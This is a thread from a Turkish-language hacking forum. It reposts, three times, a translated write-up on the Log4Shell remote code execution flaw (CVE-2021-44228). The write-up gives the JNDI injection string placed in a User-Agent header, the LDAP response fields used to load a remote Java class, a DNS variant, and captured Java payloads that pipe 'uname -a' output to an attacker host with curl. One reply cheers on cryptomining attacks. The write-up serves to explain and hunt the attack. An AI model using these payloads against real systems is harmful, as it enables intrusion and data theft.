Exploit 0Day RCE exploit Log4Shell

Katılım
4 Kas 2020
Tepki puanı
11,883
Konum
Cimetière du Père Lachaise
Rating - 100%

CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)




CVE-2021-44228 ,dünya çapında uygulamalarda yaygın olarak kullanılan Java tabanlı bir günlük aracıolan Apache Log4j kitaplığındaki bir Uzaktan Kod Yürütme güvenlik açığıdır. Bu güvenlik açığı, günlük mesajlarını denetleyebilen bir saldırganın, saldırgan tarafından denetlenen sunuculardan yüklenen rastgele kodu yürütmesine olanak tanır ve Log4j kitaplığını kullanan çoğu uygulamanın bu koşulu karşılayacağını tahmin ediyoruz.

Apple, iCloud, Twitter, Cloudflare, Minecraft ,Steam servislerinin de etkilendiği görülüyor .


Log4j, günlük bilgilerini kaydetmek için iş sistemleri de dahil olmak üzere çoğu Java uygulamasında kullanılan çok yaygın bir günlük kitaplığı olduğundan, etkisi geniş ölçeklidir.

Yaygın istismar olasılığını artıran birkaç faktör vardır: Güvenlik açığı, uzun süredir var olan bir RCE'dir, kitaplık geniş çapta dağıtılmıştır ve vasıfsız saldırganlar bile onu tetikleyebilir. Temel olarak, tatillerde kurumsal ekipleri hazırlıksız yakalamayı uman fidye yazılımı operatörleri, Noel Baba'dan mükemmel bir hediye aldı çee . Bir POC yayınlandıktan 24 saatten kısa bir süre sonra ortaya çıkan, bu güvenlik açığından yararlanan bir cryptominer bildirildi .

jndi: dizesinin ilk eklenmesinden sonra, komutun yürütülmesine neden olan ikincil yüke erişmek için bir URI izlenir.

1639308287864.png

1639308313400.png


Saldırgan bir başlangıç jndi: eklemesi oluşturacak ve bunu User-Agent HTTP Header'ına dahil edecektir:
User-Agent: ${jndi:ldap://<host>:<port>/<path>}

Artık savunmasız Log4j örneği, dahil edilen URI'ye bir LDAP sorgusu yapacak. LDAP sunucusu daha sonra ikincil yük bağlantısını içeren dizin bilgileriyle yanıt verecektir:

dn:
javaClassName: <class name>
javaCodeBase: <base URL>
objectClass: javaNamingReference
javaFactory: <file base>

javaFactoryVe javaCodeBase değerler daha sonra nihai yük gösteren Java sınıfı içeren nesnenin yer oluşturmak için kullanılır. Son olarak, Java sınıfı belleğe yüklenir ve savunmasız Log4j örneği tarafından yürütülür ve kod yürütme yolu tamamlanır.

Fastly Security Araştırma Ekibi ayrıca, dize kullanımı yoluyla savunmasız Log4j bulut sunucusu tarafından DNS sorgularının yürütülmesini zorlamak için isteğe bağlı bir yeteneği başarıyla yeniden oluşturdu:

${jndi:dns://<dns server>/<TXT record query string>}

Şu anda, DNS'nin rasgele kod yürütme için bir yol sağladığı açık değildir, ancak güvenlik açığını taramak veya hatta diğer güvenlik kontrolleri iletişimi engellediğinde (çıkış güvenlik duvarı kuralı gibi) DNS üzerinden veri tüneli yapmak için kullanılabilir.

Saldırıyı yürütmek, bazı saldırganların aşina olmadığı araçlar gerektirse de, LDAP üzerinden nihai tam kod yürütme yolu zor değildir. Saldırganların daha ilk gün bilgi ve becerilerini artırdığını gördük ve bu böyle devam edecek.

Bu güvenlik açığını kötüye kullanan saldırganları avlamak için, ldapsearch son yük konumlarını sıralamak ve olası kötü niyetli noktaları aramak için aracı kullanmak yardımcı oldu . Testler gibi görünen ve aşağıdaki gibi kodları içeren LDAP yanıtları tarafından atıfta bulunulan birden çok payload aldık:

String payload = "uname -a | curl -d @- http://<host>";
String[] cmds = {"/bin/bash", "-c", payload};
java.lang.Runtime.getRuntime().exec(cmds);
class Exploit {
static {
try { Runtime.getRuntime().exec("touch /tmp/pwned"); } catch(Exception e) {}
}
}


Ancak, tartışıldığı gibi, bu açıkça daha kötü niyetli kod yürütme yeteneğini gösterir.


Örnekler:
1639308617637.png1639308632203.png

1639309694632.png

"John Hammond"
 
Katılım
4 Kas 2020
Tepki puanı
11,883
Konum
Cimetière du Père Lachaise
Rating - 100%
Paylaşılmıştır diye düşünüyordum çünkü exploit yayınlandı ve üstüne poc scripting bile yapıldı ancak hala burda içerik görmediğimden paylaşayım dedim 3 gün oldu yoksa,çoğu mc sunucusu güvenliği sağladı ancak hala birçok vulnlu server var,apple konusunda bir gelişme yok,cf ceosu bu konunun üstüne düşeceğini ve tüm müşterilerine koruma sağlıyacagını belirtti.
 
Son düzenleme:
Katılım
27 Nis 2021
Tepki puanı
1,831
Rating - 100%

CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)




CVE-2021-44228 ,dünya çapında uygulamalarda yaygın olarak kullanılan Java tabanlı bir günlük aracıolan Apache Log4j kitaplığındaki bir Uzaktan Kod Yürütme güvenlik açığıdır. Bu güvenlik açığı, günlük mesajlarını denetleyebilen bir saldırganın, saldırgan tarafından denetlenen sunuculardan yüklenen rastgele kodu yürütmesine olanak tanır ve Log4j kitaplığını kullanan çoğu uygulamanın bu koşulu karşılayacağını tahmin ediyoruz.

Apple, iCloud, Twitter, Cloudflare, Minecraft ,Steam servislerinin de etkilendiği görülüyor .


Log4j, günlük bilgilerini kaydetmek için iş sistemleri de dahil olmak üzere çoğu Java uygulamasında kullanılan çok yaygın bir günlük kitaplığı olduğundan, etkisi geniş ölçeklidir.

Yaygın istismar olasılığını artıran birkaç faktör vardır: Güvenlik açığı, uzun süredir var olan bir RCE'dir, kitaplık geniş çapta dağıtılmıştır ve vasıfsız saldırganlar bile onu tetikleyebilir. Temel olarak, tatillerde kurumsal ekipleri hazırlıksız yakalamayı uman fidye yazılımı operatörleri, Noel Baba'dan mükemmel bir hediye aldı çee . Bir POC yayınlandıktan 24 saatten kısa bir süre sonra ortaya çıkan, bu güvenlik açığından yararlanan bir cryptominer bildirildi .

jndi: dizesinin ilk eklenmesinden sonra, komutun yürütülmesine neden olan ikincil yüke erişmek için bir URI izlenir.

Ekli dosyayı görüntüle 27224

Ekli dosyayı görüntüle 27225


Saldırgan bir başlangıç jndi: eklemesi oluşturacak ve bunu User-Agent HTTP Header'ına dahil edecektir:
User-Agent: ${jndi:ldap://<host>:<port>/<path>}

Artık savunmasız Log4j örneği, dahil edilen URI'ye bir LDAP sorgusu yapacak. LDAP sunucusu daha sonra ikincil yük bağlantısını içeren dizin bilgileriyle yanıt verecektir:

dn:
javaClassName: <class name>
javaCodeBase: <base URL>
objectClass: javaNamingReference
javaFactory: <file base>

javaFactoryVe javaCodeBase değerler daha sonra nihai yük gösteren Java sınıfı içeren nesnenin yer oluşturmak için kullanılır. Son olarak, Java sınıfı belleğe yüklenir ve savunmasız Log4j örneği tarafından yürütülür ve kod yürütme yolu tamamlanır.

Fastly Security Araştırma Ekibi ayrıca, dize kullanımı yoluyla savunmasız Log4j bulut sunucusu tarafından DNS sorgularının yürütülmesini zorlamak için isteğe bağlı bir yeteneği başarıyla yeniden oluşturdu:

${jndi:dns://<dns server>/<TXT record query string>}

Şu anda, DNS'nin rasgele kod yürütme için bir yol sağladığı açık değildir, ancak güvenlik açığını taramak veya hatta diğer güvenlik kontrolleri iletişimi engellediğinde (çıkış güvenlik duvarı kuralı gibi) DNS üzerinden veri tüneli yapmak için kullanılabilir.

Saldırıyı yürütmek, bazı saldırganların aşina olmadığı araçlar gerektirse de, LDAP üzerinden nihai tam kod yürütme yolu zor değildir. Saldırganların daha ilk gün bilgi ve becerilerini artırdığını gördük ve bu böyle devam edecek.

Bu güvenlik açığını kötüye kullanan saldırganları avlamak için, ldapsearch son yük konumlarını sıralamak ve olası kötü niyetli noktaları aramak için aracı kullanmak yardımcı oldu . Testler gibi görünen ve aşağıdaki gibi kodları içeren LDAP yanıtları tarafından atıfta bulunulan birden çok payload aldık:

String payload = "uname -a | curl -d @- http://<host>";
String[] cmds = {"/bin/bash", "-c", payload};
java.lang.Runtime.getRuntime().exec(cmds);
class Exploit {
static {
try { Runtime.getRuntime().exec("touch /tmp/pwned"); } catch(Exception e) {}
}
}


Ancak, tartışıldığı gibi, bu açıkça daha kötü niyetli kod yürütme yeteneğini gösterir.


Örnekler:
Ekli dosyayı görüntüle 27226Ekli dosyayı görüntüle 27227

Ekli dosyayı görüntüle 27233

"John Hammond"
ağazım sulandı amınakoyim cryptominer dan çok fena kripto vurmuşlardır OIHAIFPASOIAFHUISAP
 
Katılım
25 Ocak 2021
Tepki puanı
151
Rating - 0%

CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)




CVE-2021-44228 ,dünya çapında uygulamalarda yaygın olarak kullanılan Java tabanlı bir günlük aracıolan Apache Log4j kitaplığındaki bir Uzaktan Kod Yürütme güvenlik açığıdır. Bu güvenlik açığı, günlük mesajlarını denetleyebilen bir saldırganın, saldırgan tarafından denetlenen sunuculardan yüklenen rastgele kodu yürütmesine olanak tanır ve Log4j kitaplığını kullanan çoğu uygulamanın bu koşulu karşılayacağını tahmin ediyoruz.

Apple, iCloud, Twitter, Cloudflare, Minecraft ,Steam servislerinin de etkilendiği görülüyor .


Log4j, günlük bilgilerini kaydetmek için iş sistemleri de dahil olmak üzere çoğu Java uygulamasında kullanılan çok yaygın bir günlük kitaplığı olduğundan, etkisi geniş ölçeklidir.

Yaygın istismar olasılığını artıran birkaç faktör vardır: Güvenlik açığı, uzun süredir var olan bir RCE'dir, kitaplık geniş çapta dağıtılmıştır ve vasıfsız saldırganlar bile onu tetikleyebilir. Temel olarak, tatillerde kurumsal ekipleri hazırlıksız yakalamayı uman fidye yazılımı operatörleri, Noel Baba'dan mükemmel bir hediye aldı çee . Bir POC yayınlandıktan 24 saatten kısa bir süre sonra ortaya çıkan, bu güvenlik açığından yararlanan bir cryptominer bildirildi .

jndi: dizesinin ilk eklenmesinden sonra, komutun yürütülmesine neden olan ikincil yüke erişmek için bir URI izlenir.

Ekli dosyayı görüntüle 27224

Ekli dosyayı görüntüle 27225


Saldırgan bir başlangıç jndi: eklemesi oluşturacak ve bunu User-Agent HTTP Header'ına dahil edecektir:
User-Agent: ${jndi:ldap://<host>:<port>/<path>}

Artık savunmasız Log4j örneği, dahil edilen URI'ye bir LDAP sorgusu yapacak. LDAP sunucusu daha sonra ikincil yük bağlantısını içeren dizin bilgileriyle yanıt verecektir:

dn:
javaClassName: <class name>
javaCodeBase: <base URL>
objectClass: javaNamingReference
javaFactory: <file base>

javaFactoryVe javaCodeBase değerler daha sonra nihai yük gösteren Java sınıfı içeren nesnenin yer oluşturmak için kullanılır. Son olarak, Java sınıfı belleğe yüklenir ve savunmasız Log4j örneği tarafından yürütülür ve kod yürütme yolu tamamlanır.

Fastly Security Araştırma Ekibi ayrıca, dize kullanımı yoluyla savunmasız Log4j bulut sunucusu tarafından DNS sorgularının yürütülmesini zorlamak için isteğe bağlı bir yeteneği başarıyla yeniden oluşturdu:

${jndi:dns://<dns server>/<TXT record query string>}

Şu anda, DNS'nin rasgele kod yürütme için bir yol sağladığı açık değildir, ancak güvenlik açığını taramak veya hatta diğer güvenlik kontrolleri iletişimi engellediğinde (çıkış güvenlik duvarı kuralı gibi) DNS üzerinden veri tüneli yapmak için kullanılabilir.

Saldırıyı yürütmek, bazı saldırganların aşina olmadığı araçlar gerektirse de, LDAP üzerinden nihai tam kod yürütme yolu zor değildir. Saldırganların daha ilk gün bilgi ve becerilerini artırdığını gördük ve bu böyle devam edecek.

Bu güvenlik açığını kötüye kullanan saldırganları avlamak için, ldapsearch son yük konumlarını sıralamak ve olası kötü niyetli noktaları aramak için aracı kullanmak yardımcı oldu . Testler gibi görünen ve aşağıdaki gibi kodları içeren LDAP yanıtları tarafından atıfta bulunulan birden çok payload aldık:

String payload = "uname -a | curl -d @- http://<host>";
String[] cmds = {"/bin/bash", "-c", payload};
java.lang.Runtime.getRuntime().exec(cmds);
class Exploit {
static {
try { Runtime.getRuntime().exec("touch /tmp/pwned"); } catch(Exception e) {}
}
}


Ancak, tartışıldığı gibi, bu açıkça daha kötü niyetli kod yürütme yeteneğini gösterir.


Örnekler:
Ekli dosyayı görüntüle 27226Ekli dosyayı görüntüle 27227

Ekli dosyayı görüntüle 27233

"John Hammond"
Eline sağlık
 
131,495Konular
3,268,694Mesajlar
315,275Kullanıcılar
Sanjar5437Son Üye
Üst Alt